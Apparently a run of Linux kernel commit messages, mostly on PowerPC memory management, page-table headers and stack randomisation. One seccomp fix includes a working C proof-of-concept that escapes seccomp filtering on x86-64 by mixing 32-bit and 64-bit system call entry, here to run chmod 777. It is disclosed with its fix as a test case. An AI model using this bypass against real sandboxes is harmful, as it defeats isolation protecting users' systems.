This moves some MMU related init code out of setup_64.c into hash_utils_64.c
and calls it early_init_mmu() and early_init_mmu_secondary(). This will
make it easier to plug in a new MMU type.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
ppc32 has it already, add it to ppc64 as a preliminary for adding
support for Book3E 64-bit support
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Now that they are almost identical, we can merge some of the definitions
related to the PTE format into common files.
This creates a new pte-common.h which is included by both 32 and 64-bit
right after the CPU specific pte-*.h file, and which defines some
bits to "default" values if they haven't been defined already, and
then provides a generic definition of most of the bit combinations
based on these and exposed to the rest of the kernel.
I also moved to the common pgtable.h most of the "small" accessors to the
PTE bits and modification helpers (pte_mk*). The actual accessors remain
in their separate files.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
This patch tweaks the way some PTE bit combinations are defined, in such a
way that the 32 and 64-bit variant become almost identical and that will
make it easier to bring in a new common pte-* file for the new variant
of the Book3-E support.
The combination of bits defining access to kernel pages are now clearly
separated from the combination used by userspace and the core VM. The
resulting generated code should remain identical unless I made a mistake.
Note: While at it, I removed a non-sensical statement related to CONFIG_KGDB
in ppc_mmu_32.c which could cause kernel mappings to be user accessible when
that option is enabled. Probably something that bitrot.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Complete workaround for DTLB errata in e300c2/c3/c4 processors.
Due to the bug, the hardware-implemented LRU algorythm always goes to way
1 of the TLB. This fix implements the proposed software workaround in
form of a LRW table for chosing the TLB-way.
Based on patch from David Jander <david@protonic.nl>
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Now that we set archdata for of_platform and platform devices via
platform_notify() we no longer need to special case having a NULL device
pointer or NULL archdata. It should be a driver error if this condition
shows up and the driver should be fixed.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Makes code futureproof against the impending change to mm->cpu_vm_mask.
It's also a chance to use the new cpumask_ ops which take a pointer
(the older ones are deprecated, but there's no hurry for arch code).
Signed-off-by: Rusty Russell <rusty@rustcorp.com.au>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
PAPR v2.3 defines fields in the virtual processor area for a dispatch
trace log (DLT). Since we'd like to use the DLT, add the necessary
fields to struct lppaca.
Signed-off-by: Jeremy Kerr <jk@ozlabs.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
The page_ins member ends at byte 0x3, not 0x4. Also, fix up the
alignment.
Signed-off-by: Jeremy Kerr <jk@ozlabs.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
This updates the 32-bit headers to use the same definitions for the RPN
shift inside the PTE as 64-bit, and thus updates _PAGE_CHG_MASK to
become identical.
This does introduce a runtime visible difference, which is that now,
_PAGE_HASHPTE will be part of _PAGE_CHG_MASK and thus preserved. However
this should have no practical effect as it should have been preserved in
the first place and we got away with not having it there due to our
PTE access functions preserving it anyway.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
This patch moves the definition of the PTE format for each MMU type
to separate files instead of all in one file. This improves overall
maintainability and will make it easier to add new types.
On 64-bit, additionally, I've separated the headers relative to the
format of the page table tree (3 vs. 4 levels for 64K vs 4K pages)
from the headers specific to the PTE format for hash based processors,
this will make it easier to add support for Book3 "E" 64-bit
implementations.
There are still some type-related ifdef's in the generic headers,
we might remove them in the long run, but this patch shouldn't result
in any code change, -hopefully- just definitions being moved around.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Weak functions aren't all they're cracked up to be. They lead to
incorrect binaries with some toolchains, they require us to have empty
functions we otherwise wouldn't, and the unused code is not elided
(as of gcc 4.3.2 anyway).
So replace the weak MSI arch hooks with the #define foo foo idiom. We no
longer need empty versions of arch_setup/teardown_msi_irq().
This is less source (by 1 line!), and results in smaller binaries too:
text data bss dec hex filename
9354300 1693916 678424 11726640 b2ef30 build/powerpc/vmlinux-before
9354052 1693852 678424 11726328 b2edf8 build/powerpc/vmlinux-after
Also smaller on x86_64 and arm (iop13xx).
Signed-off-by: Michael Ellerman <michael@ellerman.id.au>
Signed-off-by: Jesse Barnes <jbarnes@virtuousgeek.org>
Impact: build fix for powerpc and sparc
Today's linux-next build (powerpc allyesconfig) failed like this:
> In file included from include/linux/mmzone.h:776,
> from include/linux/gfp.h:5,
> from include/linux/kmod.h:23,
> from include/linux/module.h:14,
> from init/version.c:11:
> arch/powerpc/include/asm/mmzone.h:32: error: expected '=', ',', ';', 'asm' or '__attribute__' before 'numa_cpumask_lookup_table'
Caused by commit 082edb7bf4 ("numa,
cpumask: move numa_node_id default implementation to topology.h") from
the cpus4096 tree which removed the include of linux/topology.h from
linux/mmzone.h.
Same for sparc64 defconfig.
Signed-off-by: Stephen Rothwell <sfr@canb.auug.org.au>
Acked-b: Rusty Russell <rusty@rustcorp.com.au>
Cc: ppc-dev <linuxppc-dev@ozlabs.org>
LKML-Reference: <20090319220322.3baa4613.sfr@canb.auug.org.au>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
BestComm, a DMA engine in MPC52xx SoC, requires snooping when
CPU caches are enabled to work properly.
Adding CPU_FTR_NEED_COHERENT fixes NFS problems on MPC52xx machines
introduced by 'powerpc/mm: Fix handling of _PAGE_COHERENT in BAT setup
code' (sha1: 4c456a67f5).
Signed-off-by: Piotr Ziecik <kosmo@semihalf.com>
Signed-off-by: Grant Likely <grant.likely@secretlab.ca>
This patch adds the utility function mpc52xx_get_xtal_freq() to get
the frequency of the external oscillator clock connected to the pin
SYS_XTAL_IN. The MSCAN may us it as clock source. Unfortunately, this
value is not available from the FDT blob, but it can be determined
from the IPB frequency.
Signed-off-by: Wolfgang Grandegger <wg@grandegger.com>
Signed-off-by: Grant Likely <grant.likely@secretlab.ca>
Impact: cleanup
Convert the last remaining users to struct irq_chip.
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
CC: Benjamin Herrenschmidt <benh@kernel.crashing.org>
CC: linuxppc-dev@ozlabs.org
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
When the console is on a serial port to be driven by serial8250, a
character can be lost from the end of the first line in the two-line
sequence
serial8250.0: ttyS0 at MMIO 0xe0004500 (irq = 42) is a 16550A
console handover: boot [udbg0] -> real [ttyS0]
This happens because udbg_puts or udbg_write stuff the last byte of
the line into the Tx FIFO and return, whereupon the serial8250
initialization code immediately empties that FIFO. The fix: udbg_puts
and udbg_write now wait for the Tx FIFO to clear before returning.
This delays the system by one additional serial frame time for each
line written by udbg, but the effect is not noticeable, a cumulative
17 milliseconds for 200 lines of early printk output at 115200 baud.
Also, the routines in udbg_16550.c now emit CRLF instead of LFCR.
Linux makes a point of emitting CRLF because, when serial output is
captured to a file, LFCR sequences can confuse text editors. See
http://lkml.org/lkml/2006/2/4/50 for some history.
Signed-off-by: Andrew Klossner <andrew@cesa.opbu.xerox.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Change the ps3av_auto_videomode() mode id argument type from unsigned to
signed so a negative id can be detected and reported as an -EINVAL failure.
Signed-off-by: Roel Kluin <roel.kluin@gmail.com>
Signed-off-by: Geoff Levand <geoffrey.levand@am.sony.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
The powerpc 64 bit architecture defines three flags for the
DABR (Data Address Breakpoint Register). Add definitions
for the currently missing DABR_DATA_WRITE and DABR_DATA_READ
flags to the powerpc reg.h file.
Signed-off-by: Geoff Levand <geoffrey.levand@am.sony.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Add macros for the GS (guest state) bit to the list of MSR bit definitions.
On PowerPC cores that support embedded hypervisor mode, GS is cleared if
the system is running in hypervisor state (and MSR[PR] is cleared), and set
if it's running in guest state. See the Power ISA 2.06 specification for
more information.
Signed-off-by: Timur Tabi <timur@freescale.com>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
This adds the necessary bits and pieces to powerpc implementation of
ioremap to benefit from caller tracking in /proc/vmallocinfo, at least
for ioremap's done after mem init as the older ones aren't tracked.
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
The e500mc core supports the new tlbilx instructions that do core
local invalidates and also provide us the ability to take down
all TLB entries matching a given PID.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call. A 64-bit process make a 32-bit system call with int $0x80.
In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table. The fix is simple: test TS_COMPAT
instead of TIF_IA32. Here is an example exploit:
/* test case for seccomp circumvention on x86-64
There are two failure modes: compile with -m64 or compile with -m32.
The -m64 case is the worst one, because it does "chmod 777 ." (could
be any chmod call). The -m32 case demonstrates it was able to do
stat(), which can glean information but not harm anything directly.
A buggy kernel will let the test do something, print, and exit 1; a
fixed kernel will make it exit with SIGKILL before it does anything.
*/
#define _GNU_SOURCE
#include <assert.h>
#include <inttypes.h>
#include <stdio.h>
#include <linux/prctl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <asm/unistd.h>
int
main (int argc, char **argv)
{
char buf[100];
static const char dot[] = ".";
long ret;
unsigned st[24];
if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
#ifdef __x86_64__
assert ((uintptr_t) dot < (1UL << 32));
asm ("int $0x80 # %0 <- %1(%2 %3)"
: "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
ret = snprintf (buf, sizeof buf,
"result %ld (check mode on .!)\n", ret);
#elif defined __i386__
asm (".code32\n"
"pushl %%cs\n"
"pushl $2f\n"
"ljmpl $0x33, $1f\n"
".code64\n"
"1: syscall # %0 <- %1(%2 %3)\n"
"lretl\n"
".code32\n"
"2:"
: "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
if (ret == 0)
ret = snprintf (buf, sizeof buf,
"stat . -> st_uid=%u\n", st[7]);
else
ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
#else
# error "not this one"
#endif
write (1, buf, ret);
syscall (__NR_exit, 1);
return 2;
}
Signed-off-by: Roland McGrath <roland@redhat.com>
[ I don't know if anybody actually uses seccomp, but it's enabled in
at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
This fixes three issues noticed by Arnd Bergmann:
- Add #ifdef __KERNEL__ and move some things around in perf_counter.h
to make sure only the bits that userspace needs are exported to
userspace.
- Use __u64, __s64, __u32 types in the structs exported to userspace
rather than u64, s64, u32.
- Make the sys_perf_counter_open syscall available to the SPUs on
Cell platforms.
And one issue that I noticed in looking at the code again:
- Wrap the perf_counter_open syscall with SYSCALL_DEFINE4 so we get
the proper handling of int arguments on ppc64 (and some other 64-bit
architectures).
Reported-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Paul Mackerras <paulus@samba.org>
Randomise ELF_ET_DYN_BASE, which is used when loading position independent
executables.
Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Randomise the lower bits of the stack address. More randomisation is good for
security but the scatter can also help with SMT threads that share an L1. A
quick test case shows this working:
int main()
{
int sp;
printf("%x\n", (unsigned long)&sp & 4095);
}
before:
80
80
80
80
80
after:
610
490
300
6b0
d80
Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
At the moment we randomise the stack by 8MB on 32bit and 64bit tasks. Since we
have a lot more address space to play with on 64bit, lets do what x86 does and
increase that randomisation to 1GB:
before:
# for i in seq `1 10` ; do sleep 1 & cat /proc/${!}/maps | grep stack; done
fffffebc000-fffffed1000 rw-p ffffffeb000 00:00 0 [stack]
ffffff5a000-ffffff6f000 rw-p ffffffeb000 00:00 0 [stack]
fffffdb2000-fffffdc7000 rw-p ffffffeb000 00:00 0 [stack]
fffffd3e000-fffffd53000 rw-p ffffffeb000 00:00 0 [stack]
fffffad9000-fffffaee000 rw-p ffffffeb000 00:00 0 [stack]
after:
# for i in seq `1 10` ; do sleep 1 & cat /proc/${!}/maps | grep stack; done
ffff5c27000-ffff5c3c000 rw-p ffffffeb000 00:00 0 [stack]
fffebe5e000-fffebe73000 rw-p ffffffeb000 00:00 0 [stack]
fffcb298000-fffcb2ad000 rw-p ffffffeb000 00:00 0 [stack]
fffc719d000-fffc71b2000 rw-p ffffffeb000 00:00 0 [stack]
fffe01af000-fffe01c4000 rw-p ffffffeb000 00:00 0 [stack]
Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Move is_32bit_task into asm/thread_info.h, that allows us to test for
32/64bit tasks without an ugly CONFIG_PPC64 ifdef.
Signed-off-by: Anton Blanchard <anton@samba.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
The e500mc supports the new msgsnd/doorbell mechanisms that were added in
the Power ISA 2.05 architecture. We use the normal level doorbell for
doing SMP IPIs at this point.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
include/asm/bootx.h:12: include of <linux/types.h> is preferred over <asm/types.h>
include/asm/bootx.h:57: found __[us]{8,16,32,64} type without #include <linux/types.h>
include/asm/elf.h:5: include of <linux/types.h> is preferred over <asm/types.h>
include/asm/kvm.h:23: include of <linux/types.h> is preferred over <asm/types.h>
include/asm/kvm.h:26: found __[us]{8,16,32,64} type without #include <linux/types.h>
include/asm/ps3fb.h:33: found __[us]{8,16,32,64} type without #include <linux/types.h>
include/asm/spu_info.h:27: found __[us]{8,16,32,64} type without #include <linux/types.h>
include/asm/swab.h:11: include of <linux/types.h> is preferred over <asm/types.h>
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Create a new header that becomes a single location for defining PowerPC
opcodes used by code that is either generationg instructions
at runtime (fixups, debug, etc.), emulating instructions, or just
compiling instructions old assemblers don't know about.
We currently don't handle the floating point emulation or alignment decode
as both are better handled by the specific decode support they already
have.
Added support for the new dcbzl, dcbal, msgsnd, tlbilx, & wait instructions
since older assemblers don't know about them.
Signed-off-by: Kumar Gala <galak@kernel.crashing.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Impact: clean up
Use a macro to save and restore the registers for PowerPC32,
since that code is duplicated.
This is similar to the work done by Cyrill Gorcunov for the
mcount code in x86_64.
Acked-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
User space can request hardware and/or software time stamping.
Reporting of the result(s) via a new control message is enabled
separately for each field in the message because some of the
fields may require additional computation and thus cause overhead.
User space can tell the different kinds of time stamps apart
and choose what suits its needs.
When a TX timestamp operation is requested, the TX skb will be cloned
and the clone will be time stamped (in hardware or software) and added
to the socket error queue of the skb, if the skb has a socket
associated with it.
The actual TX timestamp will reach userspace as a RX timestamp on the
cloned packet. If timestamping is requested and no timestamping is
done in the device driver (potentially this may use hardware
timestamping), it will be done in software after the device's
start_hard_xmit routine.
Signed-off-by: Patrick Ohly <patrick.ohly@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
This patch adds support for 256KB pages on ppc44x-based boards.
For simplification of implementation with 256KB pages we still assume
2-level paging. As a side effect this leads to wasting extra memory space
reserved for PTE tables: only 1/4 of pages allocated for PTEs are
actually used. But this may be an acceptable trade-off to achieve the
high performance we have with big PAGE_SIZEs in some applications (e.g.
RAID).
Also with 256KB PAGE_SIZE we increase THREAD_SIZE up to 32KB to minimize
the risk of stack overflows in the cases of on-stack arrays, which size
depends on the page size (e.g. multipage BIOs, NTFS, etc.).
With 256KB PAGE_SIZE we need to decrease the PKMAP_ORDER at least down
to 9, otherwise all high memory (2 ^ 10 * PAGE_SIZE == 256MB) we'll be
occupied by PKMAP addresses leaving no place for vmalloc. We do not
separate PKMAP_ORDER for 256K from 16K/64K PAGE_SIZE here; actually that
value of 10 in support for 16K/64K had been selected rather intuitively.
Thus now for all cases of PAGE_SIZE on ppc44x (including the default, 4KB,
one) we have 512 pages for PKMAP.
Because ELF standard supports only page sizes up to 64K, then you should
use binutils later than 2.17.50.0.3 with '-zmax-page-size' set to 256K
for building applications, which are to be run with the 256KB-page sized
kernel. If using the older binutils, then you should patch them like follows:
--- binutils/bfd/elf32-ppc.c.orig
+++ binutils/bfd/elf32-ppc.c
-#define ELF_MAXPAGESIZE 0x10000
+#define ELF_MAXPAGESIZE 0x40000
One more restriction we currently have with 256KB page sizes is inability
to use shmem safely, so, for now, the 256KB is available only if you turn
the CONFIG_SHMEM option off (another variant is to use BROKEN).
Though, if you need shmem with 256KB pages, you can always remove the !SHMEM
dependency in 'config PPC_256K_PAGES', and use the workaround available here:
http://lkml.org/lkml/2008/12/19/20
Signed-off-by: Yuri Tikhonov <yur@emcraft.com>
Signed-off-by: Ilya Yanok <yanok@emcraft.com>
Signed-off-by: Josh Boyer <jwboyer@linux.vnet.ibm.com>